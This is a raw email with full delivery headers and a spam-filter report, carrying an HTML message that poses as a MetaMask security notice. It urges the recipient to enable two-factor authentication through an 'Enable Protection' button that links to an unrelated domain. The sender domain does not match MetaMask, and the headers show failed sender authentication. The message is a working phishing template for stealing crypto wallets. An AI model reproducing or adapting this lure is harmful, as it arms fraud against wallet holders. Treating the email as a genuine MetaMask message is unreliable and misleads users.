Return-Path: <postmaster@c4b9454e57.nxcli.io>
Delivered-To: behniwal@server.rnv.kpw.mybluehostin.me
Received: from server.rnv.kpw.mybluehostin.me
	by server.rnv.kpw.mybluehostin.me with LMTP
	id QiZnFyzNbGc4aQAAyTkJsw
	(envelope-from <postmaster@c4b9454e57.nxcli.io>)
	for <behniwal@server.rnv.kpw.mybluehostin.me>; Wed, 25 Dec 2024 20:27:40 -0700
Return-path: <postmaster@c4b9454e57.nxcli.io>
Envelope-to: info@behniwalgroup.com
Delivery-date: Wed, 25 Dec 2024 20:27:40 -0700
Received: from cloudhost-2573573.us-midwest-1.nxcli.net ([8.29.155.54]:56754)
	by server.rnv.kpw.mybluehostin.me with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	(Exim 4.95)
	(envelope-from <postmaster@c4b9454e57.nxcli.io>)
	id 1tQeXC-0006zf-Sg
	for info@behniwalgroup.com;
	Wed, 25 Dec 2024 20:27:40 -0700
Received: (qmail 9734 invoked by uid 10138); 26 Dec 2024 03:26:57 +0000
Date: 26 Dec 2024 03:26:57 +0000
Message-ID: <20241226032657.9732.qmail@cloudhost-2573573.us-midwest-1.nxcli.net>
To: info@behniwalgroup.com
Subject: =?UTF-8?B?S2VlcCBZb3VyIFdhbGxldCBTZWN1cmUgd2l0aCBUd28tRmFjdG9yIEF1dGhlbnRpY2F0aW9u?=
X-PHP-Originating-Script: 10138:mail.php
From: MetaMask Notifications <1jg8w6od@account-authentication.com>
Reply-To: no-reply@example.com
Content-Type: text/html; charset=UTF-8
X-Mailer-ID: 676ccd01c96a7
X-Origin-IP: 192.168.1.234
X-Message-ID: 7f24268a4fd55bf7afa2a55fc866c458
X-Origin-Time: 2024-12-26 03:26:57
X-Campaign-ID: 307a5ac778e8e22f
List-Unsubscribe: <mailto:unsubscribe@example.com>
X-Spam-Status: No, score=2.9
X-Spam-Score: 29
X-Spam-Bar: ++
X-Ham-Report: Spam detection software, running on the system "server.rnv.kpw.mybluehostin.me",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Secure Your Crypto Wallet Secure Your Crypto Wallet Dear User,
    Enhance the security of your crypto wallet today. Activating Two-Factor Authentication
    (2FA) is the best way to protect your wallet from unauthorized access. 
 Content analysis details:   (2.9 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: metamask.io]
  0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE:
                             The query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [8.29.155.54 listed in sa-accredit.habeas.com]
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [8.29.155.54 listed in bl.score.senderscore.com]
  0.2 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level
                             mail domains are different
  0.0 HTML_MESSAGE           BODY: HTML included in message
  1.3 HTML_IMAGE_ONLY_24     BODY: HTML: images with 2000-2400 bytes of
                             words
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
  1.0 KAM_LAZY_DOMAIN_SECURITY Sending domain does not have any
                             anti-forgery methods
  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required
                             MIME headers
  0.2 KAM_DMARC_NONE         DKIM has Failed or SPF has failed on the message
                             and the domain has no DMARC policy
X-Spam-Flag: NO


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Secure Your Crypto Wallet</title>
    <style>
        body { font-family: Arial, sans-serif; background-color: #f9f9f9; margin: 0; padding: 0; }
        .container { max-width: 600px; margin: 20px auto; background: #ffffff; border-radius: 8px; box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1); overflow: hidden; }
        .header { background-color: #f6851b; padding: 10px; text-align: center; }
        .header img { max-width: 80px; height: auto; }
        .content { padding: 20px; }
        .content h2 { color: #333; font-size: 20px; text-align: center; }
        .content p { line-height: 1.6; color: #555; font-size: 16px; text-align: justify; }
        .cta { text-align: center; margin: 20px 0; }
        .cta a { display: inline-block; padding: 15px 25px; color: #ffffff; background-color: #f6851b; text-decoration: none; font-weight: bold; border-radius: 5px; font-size: 16px; }
        .cta a:hover { background-color: #e67e22; }
        .footer { padding: 10px 20px; text-align: center; font-size: 12px; color: #aaa; background-color: #f9f9f9; }
        .footer p { margin: 5px 0; }
        .footer a { color: #f6851b; text-decoration: none; }
        .footer a:hover { text-decoration: underline; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <img src="https://raw.githubusercontent.com/MetaMask/brand-resources/master/SVG/SVG_MetaMask_Icon_Color.svg" alt="MetaMask Logo">
        </div>
        <div class="content">
            <h2>Secure Your Crypto Wallet</h2>
            <p>Dear User,<br>Enhance the security of your crypto wallet today. Activating Two-Factor Authentication (2FA) is the best way to protect your wallet from unauthorized access.</p>
            <div class="cta">
                <a href="https://saharshavikloo.com/m?id=5698168967082622666-3630">Enable Protection</a>
            </div>
        </div>
        <div class="footer">
            <p>© 2024 MetaMask. All rights reserved.</p>
            <p>This is an automated message. Do not reply.</p>
            <p><a href="{unsubscribe_link}">Unsubscribe</a> | <a href="https://metamask.io/">Visit MetaMask</a></p>
        </div>
    </div>
</body>
</html>
<!-- Random-ID: 676ccd01c96b6 -->
